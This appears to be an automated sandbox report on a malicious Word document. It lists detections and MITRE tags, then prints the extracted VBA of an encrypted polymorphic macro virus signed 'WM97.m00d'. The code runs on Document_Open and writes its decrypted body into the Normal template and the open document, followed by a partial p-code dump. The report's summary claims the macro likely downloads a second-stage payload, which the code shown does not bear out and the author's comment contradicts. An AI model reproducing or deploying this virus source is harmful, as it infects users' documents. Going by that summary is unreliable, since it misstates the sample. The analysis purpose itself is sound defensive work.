MALICIOUS
128
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample exhibits characteristics of a legacy WordBasic macro virus, specifically triggering the 'OLE_LEGACY_WORDBASIC_MACRO_VIRUS' heuristic. The presence of a 'Document_Open' macro and the ClamAV detection 'Doc.Trojan.Garble-1' further indicate malicious intent. The obfuscated VBA script within the 'macros.bas' file likely attempts to download and execute a second-stage payload, a common tactic for this type of malware.
Heuristics 4
-
ClamAV: Doc.Trojan.Garble-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Garble-1
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24483 bytes |
SHA-256: 4d3659d9843731966b5c9b56c54b5620c9935fa6a1d4aa5798be23fa6bd71078 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Modul 1"
Private Sub Document_Open()
'25
'
'w–In››�›I{Žťź—ŹJxŹ˘žKRx¤yŚ��KiL™\\�fL�ź–ˇˇ’›o¦MjN”^ “N‰�q^‚š�ś¦”ˇšŁ_t†sŤ
'
'{�R€ˇ¤ź”ź‡� Łź”§�bŠv„¦Łž™—©c‹wx¤˘Ą¤¤›¤Ş©^g_dz¦›ś„¦›¬Łťf¤ˇ¦ť«`ieYjbYvY[‰¬Ł°›®źZŤŻś[ Şž°¨ ©Ż›‹¬ˇŞde^\‘Ą˘«]‹‘†‹^{^’°łŁ
'{�Rs•¦›©�w˘–¨ �ˇ§bŠv„¦Łž™—©c‹wx¤˘Ą¤¤›¤Ş©^g_dz¦›ś„¦›¬Łťf¤ˇ¦ť«`ieYjbYvY[‰¬Ł°›®źZŤŻś[ Şž°¨ ©Ż›‹¬ˇŞde^\‘Ą˘«]~�†‹^{^’°łŁ
'
'i‡AoujoA^Av”—‡Bc�†BdglqC_aCw–™‰DxŚ‰’
'FyŚ›Go–š›GdHv—š•‰”|Ť–™•ŠťŽW kzś™”ŹŤžX€mnš�›š™�™ źT]UZo›�’zś‘˘™’
'GzŚ›G{�šŹŤśHeHi‹ť’źŽm�Śž–Ź�žX€lzś™•�ŽźY�mnš™ś›š‘š źT^V[pś‘’zś‘Łš“
'_�~:c€
'
'i‡AoujoA]_Bv”—‡Bc�†CdglqC`Cw–™‰DxŚ‰’
'FyŚ›Go–š›GdHi‹ś‘žŤl—Śž–Ž—ťW kzś™”ŹŤžX€mnš�›š™�™ źT]UZo›�’zś‘˘™’
'GzŚ›G{�šŹŤśHeHv—›–Š•}Ž–™•‹žŹX€lzś™•�ŽźY�mnš™ś›š‘š źT^V[pś‘’zś‘Łš“
'_�~:c€
'
'nŹ|ŤŹ‡„Ź�V
'A·Ŕ§Ŕ°Ë
'A§âÍÂą¤×
'AÓÉÚž¬˘¤
'AĄśĂĚÄ
'BŁ«Ďľ¸©ŇâŤ
'BşżÁ¬µ¤ÉŞâ
'@Ľ°Ü
'B±ÎŻŁź´ŘłŻ
'A®¶ Ŕ¬ÜČ
'BáµĹ˘Ë»ĺ¦â
'B¶¨Ŕ榟¶
'AŕÄ»ŰÚÎŇ
'_� ‡„ŽŹU
'
'eŽ‘?x@]@Q@tŹ@i�”•O„�–Ź–‘�Ž‹�‡•
'n‹Em”�šT’Ź”‹™N~RGXPGdGIv•Hmšš—šHzŤśž–ŽIwŽˇťLJ~’Ź�JrvKhK�
'f�=aŚŚ’>Z\>r�“„?s‡„Ť
'????•‹�Ť…@]@hŹ“”NŤŠŹ†”IyMASK
'@@@A—„�…†A^A�…‘†‡BHB�ŹŚ‘�CICf‹–LUWM
'<<<<’�…Š‚=Z=??
'FFFFoŚGo–š›U“�•Ť›P€THYQHfIKy›’źŠťŹJ}źŚJn™Ť ��™źŠn—šź‘TUNL€”‘›
'BBBBBCCC™†’‡�CaDš‡“�‰DJEGj“‰Exš‡HFLFiŽ�NWYP
'<<<<<<<<fi=Z=u
'=======>bŤŚ’>[>r‘”„
';;;;`‰ <e‚
'_�~:c€
'j‡Ai‘•–PŽ‹�‡•K{OCTLC`CFw�…–��Ť—™_GEyŤŠ“
';<<<c‹<Y<pŹ’‚
'_�~:c€
'l‰Dl“—�R�Ť’Š�M}QEVNEcFHk”Š’Ź™šaIG{ŹŚ•Gk—–ŤHeH|šťŽ
'i†@gŹA^Au“–†Ab�†Bf‘�‡B^aCw•��Cw‹‰’
'BCCCl‰CpŚ‡Ll“—�R�Ť’Š�M}QEVNQFWRFWOFcFHNIG{ŹŚ•
'BBBBBBBCrŹ‡Ź�‘C`Dp‰’Ll“—�S‘Ž“Š�M}QFWOOFSFW
'CCDDDDDDs��{†—EbErŽ‰Nn•™šT’Ź”‹šO SGXPSGZTHw”Ś”Ť–R
'??@@@@@@s‰š†A^AjŹ•Is�†BLB[KBMCV
'>>>>????eŽ‘?x?]@Q@tŹ@s‰›†
'AABBBBBBBBBCkC`Cf‹•Km’�Lv’�DNE\YNEPEVXVO
'??@@@@@@@@@Ao†�w‚“A^Bp‡™x�”BHCk
'=========>>>f>[>@@
'<<<<<<<<k‚•‘=v
'>>>>>>??eŽ‘?y?\?hl@tŹ@il
'CCCCCCCCDDDDj“–DtEbEVEy”Eq‹”Nn•™šT’Ź•ŚšO�SGXPQ
'GGGGGGGHHHHHHHHHrŹIv’ŤQq�ťžX–“�ŹťR…WK\TWK{WL{���‘šULjM|™‘�ŽźM�–“ś
'@@@@@@@AAAAAAAAABBBBk�BrB`CTCw‹�‘
'OOPPPPPPPPPQQQQQQQQQRRRRs�¦—¤‰”ĄSpS€ś—[|Ł§¨b ť˘™¨]ŹaUf^aU…˘š˘›¤VaVhcW�śĄ_ ¦«¬f¤ˇ¦ť«`“eYjbbYfY‰¦ž¦ź¨ZeZkd
'DDDDDDDEEEEEEEEEFFFFFFFF”‹ž“�•ŚGdGuŤź~‰šHNHiŹťŽ› Š›
'DDDDDDDEEEEEEEEEFFFFFFFFn•š›U™Ś—“�ŠŤ”‘–ŤH‚TH—Ž •’—Ž
'DDDDDEEEEEEEEEFFFFFFFFFF•Śž“�•ŚGdHJJbHiŽśŤ› Š›IfIKKd
'>>>>>>??????????@@@@eŚ“…
'GGGHHHHHHHHHIIIIIIIIIJJJŚŹ�™śŹˇŚťKhKx”ŹTt›ź Z�•š’ U‡YM^VYM_ZN~N[N_W
'PPPQQQQQQQQQRRRRRRRRRSSSt™§�Ą‰”¦TqT�ť�\|¤¨©cˇžŁš¨^�bVg_bV†WbW†Ł›ŁśĄdX„ť¦`€§«gĄ˘§ž¬a“fZkccZgZŠZh[Š§ź§ ©[g\me
'FFGGGGGGGGGHHHHHHHHHIIII—Ž •’�ŹJgJŚŹ�™ť�ˇŚťKQKy‘Ł‚ŤžLRLm“ˇ’ź�Žź
'DDDDDDDEEEEEEEEEFFFFFFFFn•š›U™Ś—“�ŠŤ”‘–ŤH‚TH—Ž •’—Ž
'GGGHHHHHHHHHIIIIIIIIIJJJ�Źˇ–“��KhKMMeKl’ ‘ž‚ŤžLiMOOgMŹ’“śź“¤Ź NkNPP
'>>??????????@@@@@@@@eŹ…Aj‡
'=>>>>>>>>>??????dŤ�?i†
'=========>>>l�–’>n
'<<<<<<<<k‚•‘=w
'@@@@@@@@Ž†�”•“ŠŹ�A_BDIDBHBp�šy„•
'AAAAAAAAj‘•–P”‡’Ž„†�ŹŚ‘�C{PD’‰›—�–Ť“Ś
'@@@AAAAAo†�w�”B_BDD\B‘�š–—•Ś‘ŠDaDFF
';;;;`‰ <e‚
'_�~:c€
'h ’Ž:r
'
's€‘†„“M�Ť’…’”Ś‰Ž…“@RMA—„�…†
'l�–j„�?\?hŤ“HrŽ„@J@RUJALAR
'hŹ“”N“†‘Ť‚„†ŤŠ�‡BTNBJDIECICq�šn�ťM
'
'f:W:M
'fŹ’AzA^AjmALBSBv‘Bj‘•—Q†’�‘—’‰�Ť’‰—
'EEEEn‹Fn•™šT’Ź”‹šO€SGXPGdHJOŤ–Ś‹—ŚŽKI}‘Ž—Išź“ž�™ˇJgJ ť �
'AAAAg�”BvB_BSBv’Co�‘Kk’–�R�Ť’‰—L}QEVNN
'GGGGGHHH›ťŠ“ŤˇIfIr—ťQQQ^JTJvŹ�RršžźY—”™�žT…XL]UULWM_MWM�VVM\N_f\aW
'AAAABBBB�B_BoŚ‡Kk’–—QŹŤ’‰—L}PDUNQEyQEVN
'======== >[>_‘�F G
'??@@@@@@c@]A�ALAo†�l‡›BMB•—„Ť�ś
'========`>[>a†�FaG
'??@@@@@@t…Ť‘ŤŠŹ†A^Au‡Ź’Ž‹�‡BHCf
';;;;i€“�<p
'AAAAi�•–P”‡’Ž�…�ŹŚ‘�CoOCFKFDJDx‰‘•‘Ž“Š
'????s„ŚŹŚ‰Ž…@]@BB[AmA^AmALBS
'h…@‘•‰”ŽŹ—@^Au“–†Au‰‡�Bgš‹–Bh’•
'h ’Ž:s
'
'nŹ”‰ŹŽ“Nv‰’–”q“�•†„•‹‘�B_Bh�Ž–�
'o�”‰ŹŹ”Od�Ź‡Š“Źe‘��‡”•‹’‘–C`Ci„Ź—‰
'o�”‰ŹŽ“Ns‚—†o�“Ž‚Ťr”‘Ź’–B_Bi„Ź–�
'
'c†—Ś™�g’†�‘‰’�Rw…š‰f�Ef�™Ž›Šj•‰›“‹”šTlś““u�”Ś
'
'f‘Bw�–‹ŹCk’–—QŹŚ’‰—LmpDODVQEVNEbEGk”ŠFy›�H
'??@@@hŹ“”N„†Ť†•†ŤŠŹ†•BknBMBSNCT
'e‰‰Š
'A ‰ ~Š €
Set ‹‚©˛Ş = NormalTemplate.VBProject
Set ť¦ŤĄ•° = ‹‚©˛Ş.VBComponents(1).CodeModule
Set ŤÇ˛§ž‰Ľ = ActiveDocument.VBProject
Set ą®ż�‘‡‰ = ŤÇ˛§ž‰Ľ.VBComponents(1).CodeModule
If ť¦ŤĄ•°.lines(1, 1) <> "Private Sub Document_Open()" Then Set ��´ŁśŤ¶Ć©� = ą®ż�‘‡‰
If ą®ż�‘‡‰.lines(1, 1) <> "Private Sub Document_Open()" Then Set ��´ŁśŤ¶Ć©� = ť¦ŤĄ•°
If ��´ŁśŤ¶Ć©� = "" Then Exit Sub
For ź¤¦‘š‰ŽĆ = 3 To ��´ŁśŤ¶Ć©�.countoflines
If Mid(��´ŁśŤ¶Ć©�.lines(ź¤¦‘š‰ŽĆ, 1), 1, 1) <> "'" Then Exit For
˘– = Mid(��´ŁśŤ¶Ć©�.lines(ź¤¦‘š‰ŽĆ, 1), 2, Len(��´ŁśŤ¶Ć©�.lines(ź¤¦‘š‰ŽĆ, 1)))
For –ł”�„™Ľ—“ = 1 To Len(˘–Â)
”›…Ą‘Á = Chr(Asc(Mid(˘–Â, –ł”�„™Ľ—“, 1)) - (Right(��´ŁśŤ¶Ć©�.lines(2, 1), Len(��´ŁśŤ¶Ć©�.lines(2, 1)) - 1)) - (Int(((4 * Len(˘–Â) + 2 * –ł”�„™Ľ—“)) / 18.3)))
ĆšŞ‡° ÉŠĆ = ĆšŞ‡° ÉŠĆ & ”›…Ą‘Á
Next –ł”�„™Ľ—“
›ŤĄ’Ë‹„› = ›ŤĄ’Ë‹„› & ĆšŞ‡° ÉŠĆ & Chr(13): ĆšŞ‡° ÉŠĆ = ""
Next ź¤¦‘š‰ŽĆ
For Ć© Ŕżł· = 1 To ��´ŁśŤ¶Ć©�.countoflines
If ��´ŁśŤ¶Ć©�.lines(Ć© Ŕżł·, 1) = "Private Sub Document_Close()" Then
Application.ScreenUpdating = False
��´ŁśŤ¶Ć©�.insertlines Ć© Ŕżł· + 1, ›ŤĄ’Ë‹„›
Exit For
End If
Next Ć© Ŕżł·
Call Document_Close
NormalTemplate.Save
ActiveDocument.SaveAs ActiveDocument.FullName
End Sub
Private Sub Document_Close()
End Sub
'<-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=->
'MyName = WM97.m00d
'WrittenBy = f0re [UC/Skamerks/DVC]
'
'This is my first attempt to write an encrypted polymorphic macro virus.
'I havent included any payload. Stealth is also left out (see my other macros for
'good stealth techniques). Although this virus is a bit slow, it works fine. I did have
'some problems with the randomly generated key. Though you can check this out for yourself.
'If you find any other errors please let me know. Have phun.
'<-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=->
' Processing file: /tmp/qstore_psvmksq0
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Modul 1 - 12696 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' QuoteRem 0x0000 0x0002 "25"
' Line #2:
' QuoteRem 0x0000 0x0000 ""
' Line #3:
' QuoteRem 0x0000 0x0048 "w–In››�›I{Žťź—ŹJxŹ˘žKRx¤yŚ��KiL™\\�fL�ź–ˇˇ’›o¦MjN”^ “N‰�q^‚š�ś¦”ˇšŁ_t†sŤ"
' Line #4:
' QuoteRem 0x0000 0x0000 ""
' Line #5:
' QuoteRem 0x0000 0x0073 "{�R€ˇ¤ź”ź‡� Łź”§�bŠv„¦Łž™—©c‹wx¤˘Ą¤¤›¤Ş©^g_dz¦›ś„¦›¬Łťf¤ˇ¦ť«`ieYjbYvY[‰¬Ł°›®źZŤŻś[ Şž°¨ ©Ż›‹¬ˇŞde^\‘Ą˘«]‹‘†‹^{^’°łŁ"
' Line #6:
' QuoteRem 0x0000 0x0073 "{�Rs•¦›©�w˘–¨ �ˇ§bŠv„¦Łž™—©c‹wx¤˘Ą¤¤›¤Ş©^g_dz¦›ś„¦›¬Łťf¤ˇ¦ť«`ieYjbYvY[‰¬Ł°›®źZŤŻś[ Şž°¨ ©Ż›‹¬ˇŞde^\‘Ą˘«]~�†‹^{^’°łŁ"
' Line #7:
' QuoteRem 0x0000 0x0000 ""
' Line #8:
' QuoteRem 0x0000 0x0024 "i‡AoujoA^Av”—‡Bc�†BdglqC_aCw–™‰DxŚ‰’"
' Line #9:
' QuoteRem 0x0000 0x003F "FyŚ›Go–š›GdHv—š•‰”|Ť–™•ŠťŽW kzś™”ŹŤžX€mnš�›š™�™ źT]UZo›�’zś‘˘™’"
' Line #10:
' QuoteRem 0x0000 0x0041 "GzŚ›G{�šŹŤśHeHi‹ť’źŽm�Śž–Ź�žX€lzś™•�ŽźY�mnš™ś›š‘š źT^V[pś‘’zś‘Łš“"
' Line #11:
' QuoteRem 0x0000 0x0006 "_�~:c€"
' Line #12:
' QuoteRem 0x0000 0x0000 ""
' Line #13:
' QuoteRem 0x0000 0x0024 "i‡AoujoA]_Bv”—‡Bc�†CdglqC`Cw–™‰DxŚ‰’"
' Line #14:
' QuoteRem 0x0000 0x003F "FyŚ›Go–š›GdHi‹ś‘žŤl—Śž–Ž—ťW kzś™”ŹŤžX€mnš�›š™�™ źT]UZo›�’zś‘˘™’"
' Line #15:
' QuoteRem 0x0000 0x0041 "GzŚ›G{�šŹŤśHeHv—›–Š•}Ž–™•‹žŹX€lzś™•�ŽźY�mnš™ś›š‘š źT^V[pś‘’zś‘Łš“"
' Line #16:
' QuoteRem 0x0000 0x0006 "_�~:c€"
' Line #17:
' QuoteRem 0x0000 0x0000 ""
' Line #18:
' QuoteRem 0x0000 0x000A "nŹ|ŤŹ‡„Ź�V"
' Line #19:
' QuoteRem 0x0000 0x0007 "A·Ŕ§Ŕ°Ë"
' Line #20:
' QuoteRem 0x0000 0x0008 "A§âÍÂą¤×"
' Line #21:
' QuoteRem 0x0000 0x0008 "AÓÉÚž¬˘¤"
' Line #22:
' QuoteRem 0x0000 0x0006 "AĄśĂĚÄ"
' Line #23:
' QuoteRem 0x0000 0x000B "BŁ«Ďľ¸©ŇâŤ"
' Line #24:
' QuoteRem 0x0000 0x000A "BşżÁ¬µ¤ÉŞâ"
' Line #25:
' QuoteRem 0x0000 0x0004 "@Ľ°Ü"
' Line #26:
' QuoteRem 0x0000 0x000A "B±ÎŻŁź´ŘłŻ"
' Line #27:
' QuoteRem 0x0000 0x0008 "A®¶ Ŕ¬ÜČ"
' Line #28:
' QuoteRem 0x0000 0x000A "BáµĹ˘Ë»ĺ¦â"
' Line #29:
' QuoteRem 0x0000 0x0009 "B¶¨Ŕ榟¶"
' Line #30:
' QuoteRem 0x0000 0x0008 "AŕÄ»ŰÚÎŇ"
' Line #31:
' QuoteRem 0x0000 0x0008 "_� ‡„ŽŹU"
' Line #32:
' QuoteRem 0x0000 0x0000 ""
' Line #33:
' QuoteRem 0x0000 0x001E "eŽ‘?x@]@Q@tŹ@i�”•O„�–Ź–‘�Ž‹�‡•"
' Line #34:
' QuoteRem 0x0000 0x0038 "n‹Em”�šT’Ź”‹™N~RGXPGdGIv•Hmšš—šHzŤśž–ŽIwŽˇťLJ~’Ź�JrvKhK�"
' Line #35:
' QuoteRem 0x0000 0x0014 "f�=aŚŚ’>Z\>r�“„?s‡„Ť"
' Line #36:
' QuoteRem 0x0000 0x001C "????•‹�Ť…@]@hŹ“”NŤŠŹ†”IyMASK"
' Line #37:
' QuoteRem 0x0000 0x0023 "@@@A—„�…†A^A�…‘†‡BHB�ŹŚ‘�CICf‹–LUWM"
' Line #38:
' QuoteRem 0x0000 0x000E "<<<<’�…Š‚=Z=??"
' Line #39:
' QuoteRem 0x0000 0x003D "FFFFoŚGo–š›U“�•Ť›P€THYQHfIKy›’źŠťŹJ}źŚJn™Ť ��™źŠn—šź‘TUNL€”‘›"
' Line #40:
' QuoteRem 0x0000 0x002B "BBBBBCCC™†’‡�CaDš‡“�‰DJEGj“‰Exš‡HFLFiŽ�NWYP"
' Line #41:
' QuoteRem 0x0000 0x000E "<<<<<<<<fi=Z=u"
' Line #42:
' QuoteRem 0x0000 0x0013 "=======>bŤŚ’>[>r‘”„"
' Line #43:
' QuoteRem 0x0000 0x000A ";;;;`‰ <e‚"
' Line #44:
' QuoteRem 0x0000 0x0006 "_�~:c€"
' Line #45:
' QuoteRem 0x0000 0x0027 "j‡Ai‘•–PŽ‹�‡•K{OCTLC`CFw�…–��Ť—™_GEyŤŠ“"
' Line #46:
' QuoteRem 0x0000 0x000D ";<<<c‹<Y<pŹ’‚"
' Line #47:
' QuoteRem 0x0000 0x0006 "_�~:c€"
' Line #48:
' QuoteRem 0x0000 0x0031 "l‰Dl“—�R�Ť’Š�M}QEVNEcFHk”Š’Ź™šaIG{ŹŚ•Gk—–ŤHeH|šťŽ"
' Line #49:
' QuoteRem 0x0000 0x0022 "i†@gŹA^Au“–†Ab�†Bf‘�‡B^aCw•��Cw‹‰’"
' Line #50:
' QuoteRem 0x0000 0x002D "BCCCl‰CpŚ‡Ll“—�R�Ť’Š�M}QEVNQFWRFWOFcFHNIG{ŹŚ•"
' Line #51:
' QuoteRem 0x0000 0x002A "BBBBBBBCrŹ‡Ź�‘C`Dp‰’Ll“—�S‘Ž“Š�M}QFWOOFSFW"
' Line #52:
' QuoteRem 0x0000 0x0031 "CCDDDDDDs��{†—EbErŽ‰Nn•™šT’Ź”‹šO SGXPSGZTHw”Ś”Ť–R"
' Line #53:
' QuoteRem 0x0000 0x001F "??@@@@@@s‰š†A^AjŹ•Is�†BLB[KBMCV"
' Line #54:
' QuoteRem 0x0000 0x0019 ">>>>????eŽ‘?x?]@Q@tŹ@s‰›†"
' Line #55:
' QuoteRem 0x0000 0x0028 "AABBBBBBBBBCkC`Cf‹•Km’�Lv’�DNE\YNEPEVXVO"
' Line #56:
' QuoteRem 0x0000 0x001F "??@@@@@@@@@Ao†�w‚“A^Bp‡™x�”BHCk"
' Line #57:
' QuoteRem 0x0000 0x0012 "=========>>>f>[>@@"
' Line #58:
' QuoteRem 0x0000 0x000E "<<<<<<<<k‚•‘=v"
' Line #59:
' QuoteRem 0x0000 0x0018 ">>>>>>??eŽ‘?y?\?hl@tŹ@il"
' Line #60:
' QuoteRem 0x0000 0x002E "CCCCCCCCDDDDj“–DtEbEVEy”Eq‹”Nn•™šT’Ź•ŚšO�SGXPQ"
' Line #61:
' QuoteRem 0x0000 0x0041 "GGGGGGGHHHHHHHHHrŹIv’ŤQq�ťžX–“�ŹťR…WK\TWK{WL{���‘šULjM|™‘�ŽźM�–“ś"
' Line #62:
' QuoteRem 0x0000 0x0021 "@@@@@@@AAAAAAAAABBBBk�BrB`CTCw‹�‘"
' Line #63:
' QuoteRem 0x0000 0x0068 "OOPPPPPPPPPQQQQQQQQQRRRRs�¦—¤‰”ĄSpS€ś—[|Ł§¨b ť˘™¨]ŹaUf^aU…˘š˘›¤VaVhcW�śĄ_ ¦«¬f¤ˇ¦ť«`“eYjbbYfY‰¦ž¦ź¨ZeZkd"
' Line #64:
' QuoteRem 0x0000 0x0033 "DDDDDDDEEEEEEEEEFFFFFFFF”‹ž“�•ŚGdGuŤź~‰šHNHiŹťŽ› Š›"
' Line #65:
' QuoteRem 0x0000 0x0033 "DDDDDDDEEEEEEEEEFFFFFFFFn•š›U™Ś—“�ŠŤ”‘–ŤH‚TH—Ž •’—Ž"
' Line #66:
' QuoteRem 0x0000 0x0034 "DDDDDEEEEEEEEEFFFFFFFFFF•Śž“�•ŚGdHJJbHiŽśŤ› Š›IfIKKd"
' Line #67:
' QuoteRem 0x0000 0x0018 ">>>>>>??????????@@@@eŚ“…"
' Line #68:
' QuoteRem 0x0000 0x0043 "GGGHHHHHHHHHIIIIIIIIIJJJŚŹ�™śŹˇŚťKhKx”ŹTt›ź Z�•š’ U‡YM^VYM_ZN~N[N_W"
' Line #69:
' QuoteRem 0x0000 0x006C "PPPQQQQQQQQQRRRRRRRRRSSSt™§�Ą‰”¦TqT�ť�\|¤¨©cˇžŁš¨^�bVg_bV†WbW†Ł›ŁśĄdX„ť¦`€§«gĄ˘§ž¬a“fZkccZgZŠZh[Š§ź§ ©[g\me"
' Line #70:
' QuoteRem 0x0000 0x003F "FFGGGGGGGGGHHHHHHHHHIIII—Ž •’�ŹJgJŚŹ�™ť�ˇŚťKQKy‘Ł‚ŤžLRLm“ˇ’ź�Žź"
' Line #71:
' QuoteRem 0x0000 0x0033 "DDDDDDDEEEEEEEEEFFFFFFFFn•š›U™Ś—“�ŠŤ”‘–ŤH‚TH—Ž •’—Ž"
' Line #72:
' QuoteRem 0x0000 0x0043 "GGGHHHHHHHHHIIIIIIIIIJJJ�Źˇ–“��KhKMMeKl’ ‘ž‚ŤžLiMOOgMŹ’“śź“¤Ź NkNPP"
' Line #73:
' QuoteRem 0x0000 0x001A ">>??????????@@@@@@@@eŹ…Aj‡"
' Line #74:
' QuoteRem 0x0000 0x0016 "=>>>>>>>>>??????dŤ�?i†"
' Line #75:
' QuoteRem 0x0000 0x0012 "=========>>>l�–’>n"
' Line #76:
' QuoteRem 0x0000 0x000E "<<<<<<<<k‚•‘=w"
' Line #77:
' QuoteRem 0x0000 0x0020 "@@@@@@@@Ž†�”•“ŠŹ�A_BDIDBHBp�šy„•"
' Line #78:
' QuoteRem 0x0000 0x0025 "AAAAAAAAj‘•–P”‡’Ž„†�ŹŚ‘�C{PD’‰›—�–Ť“Ś"
' Line #79:
' QuoteRem 0x0000 0x0023 "@@@AAAAAo†�w�”B_BDD\B‘�š–—•Ś‘ŠDaDFF"
' Line #80:
' QuoteRem 0x0000 0x000A ";;;;`‰ <e‚"
' Line #81:
' QuoteRem 0x0000 0x0006 "_�~:c€"
' Line #82:
' QuoteRem 0x0000 0x0006 "h ’Ž:r"
' Line #83:
' QuoteRem 0x0000 0x0000 ""
' Line #84:
' QuoteRem 0x0000 0x001B "s€‘†„“M�Ť’…’”Ś‰Ž…“@RMA—„�…†"
' Line #85:
' QuoteRem 0x0000 0x001A "l�–j„�?\?hŤ“HrŽ„@J@RUJALAR"
' Line #86:
' QuoteRem 0x0000 0x0022 "hŹ“”N“†‘Ť‚„†ŤŠ�‡BTNBJDIECICq�šn�ťM"
' Line #87:
' QuoteRem 0x0000 0x0000 ""
' Line #88:
' QuoteRem 0x0000 0x0005 "f:W:M"
' Line #89:
' QuoteRem 0x0000 0x0023 "fŹ’AzA^AjmALBSBv‘Bj‘•—Q†’�‘—’‰�Ť’‰—"
' Line #90:
' QuoteRem 0x0000 0x0038 "EEEEn‹Fn•™šT’Ź”‹šO€SGXPGdHJOŤ–Ś‹—ŚŽKI}‘Ž—Išź“ž�™ˇJgJ ť �"
' Line #91:
' QuoteRem 0x0000 0x0026 "AAAAg�”BvB_BSBv’Co�‘Kk’–�R�Ť’‰—L}QEVNN"
' Line #92:
' QuoteRem 0x0000 0x0042 "GGGGGHHH›ťŠ“ŤˇIfIr—ťQQQ^JTJvŹ�RršžźY—”™�žT…XL]UULWM_MWM�VVM\N_f\aW"
' Line #93:
' QuoteRem 0x0000 0x0027 "AAAABBBB�B_BoŚ‡Kk’–—QŹŤ’‰—L}PDUNQEyQEVN"
' Line #94:
' QuoteRem 0x0000 0x0012 "======== >[>_‘�F G"
' Line #95:
' QuoteRem 0x0000 0x001F "??@@@@@@c@]A�ALAo†�l‡›BMB•—„Ť�ś"
' Line #96:
' QuoteRem 0x0000 0x0012 "========`>[>a†�FaG"
' Line #97:
' QuoteRem 0x0000 0x001F "??@@@@@@t…Ť‘ŤŠŹ†A^Au‡Ź’Ž‹�‡BHCf"
' Line #98:
' QuoteRem 0x0000 0x000A ";;;;i€“�<p"
' Line #99:
' QuoteRem 0x0000 0x0026 "AAAAi�•–P”‡’Ž�…�ŹŚ‘�CoOCFKFDJDx‰‘•‘Ž“Š"
' Line #100:
' QuoteRem 0x0000 0x001C "????s„ŚŹŚ‰Ž…@]@BB[AmA^AmALBS"
' Line #101:
' QuoteRem 0x0000 0x001F "h…@‘•‰”ŽŹ—@^Au“–†Au‰‡�Bgš‹–Bh’•"
' Line #102:
' QuoteRem 0x0000 0x0006 "h ’Ž:s"
' Line #103:
' QuoteRem 0x0000 0x0000 ""
' Line #104:
' QuoteRem 0x0000 0x001F "nŹ”‰ŹŽ“Nv‰’–”q“�•†„•‹‘�B_Bh�Ž–�"
' Line #105:
' QuoteRem 0x0000 0x0022 "o�”‰ŹŹ”Od�Ź‡Š“Źe‘��‡”•‹’‘–C`Ci„Ź—‰"
' Line #106:
' QuoteRem 0x0000 0x0020 "o�”‰ŹŽ“Ns‚—†o�“Ž‚Ťr”‘Ź’–B_Bi„Ź–�"
' Line #107:
' QuoteRem 0x0000 0x0000 ""
' Line #108:
' QuoteRem 0x0000 0x002D "c†—Ś™�g’†�‘‰’�Rw…š‰f�Ef�™Ž›Šj•‰›“‹”šTlś““u�”Ś"
' Line #109:
' QuoteRem 0x0000 0x0000 ""
' Line #110:
' QuoteRem 0x0000 0x002A "f‘Bw�–‹ŹCk’–—QŹŚ’‰—LmpDODVQEVNEbEGk”ŠFy›�H"
' Line #111:
' QuoteRem 0x0000 0x001F "??@@@hŹ“”N„†Ť†•†ŤŠŹ†•BknBMBSNCT"
' Line #112:
' QuoteRem 0x0000 0x0004 "e‰‰Š"
' Line #113:
' QuoteRem 0x0000 0x0008 "A ‰ ~Š €"
' Line #114:
' SetStmt
' Ld NormalTemplate
' MemLd VBProject
' Set ‹‚©˛Ş
' Line #115:
' SetStmt
' LitDI2 0x0001
' Ld ‹‚©˛Ş
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set ť¦ŤĄ•°
' Line #116:
' SetStmt
' Ld ActiveDocument
' MemLd VBProject
' Set ŤÇ˛§ž‰Ľ
' Line #117:
' SetStmt
' LitDI2 0x0001
' Ld ŤÇ˛§ž‰Ľ
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set ą®ż�‘‡‰
' Line #118:
' LitDI2 0x0001
' LitDI2 0x0001
' Ld ť¦ŤĄ•°
' ArgsMemLd lines 0x0002
' LitStr 0x001B "Private Sub Document_Open()"
' Ne
' If
' BoSImplicit
' SetStmt
' Ld ą®ż�‘‡‰
' Set ��´ŁśŤ¶Ć©�
' EndIf
' Line #119:
' LitDI2 0x0001
' LitDI2 0x0001
' Ld ą®ż�‘‡‰
' ArgsMemLd lines 0x0002
' LitStr 0x001B "Private Sub Document_Open()"
' Ne
' If
' BoSImplicit
' SetStmt
' Ld ť¦ŤĄ•°
' Set ��´ŁśŤ¶Ć©�
' EndIf
' Line #120:
' Ld ��´ŁśŤ¶Ć©�
' LitStr 0x0000 ""
' Eq
' If
' BoSImplicit
' ExitSub
' EndIf
' Line #121:
' StartForVariable
' Ld ź¤¦‘š‰ŽĆ
' EndForVariable
' LitDI2 0x0003
' Ld ��´ŁśŤ¶Ć©�
' MemLd countoflines
' For
' Line #122:
' Ld ź¤¦‘š‰ŽĆ
' LitDI2 0x0001
' Ld ��´ŁśŤ¶Ć©�
' ArgsMemLd lines 0x0002
' LitDI2 0x0001
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitStr 0x0001 "'"
' Ne
' If
' BoSImplicit
' ExitFor
' EndIf
' Line #123:
